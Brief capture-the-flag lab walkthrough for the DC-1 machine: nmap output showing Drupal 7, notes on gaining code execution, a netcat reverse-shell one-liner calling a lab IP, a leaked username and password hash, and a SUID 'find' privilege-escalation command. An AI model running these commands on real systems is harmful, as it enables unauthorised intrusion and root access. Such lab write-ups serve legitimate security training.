DC-1

22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Drupal Site | Drupal Site
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache/2.2.22 (Debian)
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          37701/tcp   status
|   100024  1          39759/udp6  status
|   100024  1          45295/tcp6  status
|_  100024  1          55275/udp   status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

running the nikto reveals it's running drupal 7

This means that it's most likely vulnerable to RCE.

The script tries to execute "id" command by default and running the script shows it was successful. Now we have RCE. 

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.164 4545 >/tmp/f

Reverse shell command worked. (Ensure to use double quotes around the commands or you'll receive a reverse shell from your own machine)

Priv Esc

R0ck3t

$S$DAK00p3Dkojkf4O/UizYxenguXnjv

SUID binary find found

ran the command from and we are root!! https://gtfobins.github.io/gtfobins/find/

find . -exec "/bin/bash" -p \;
Previoussquid (Squid proxy & localservice priv for newer windows)NextHutch

Last updated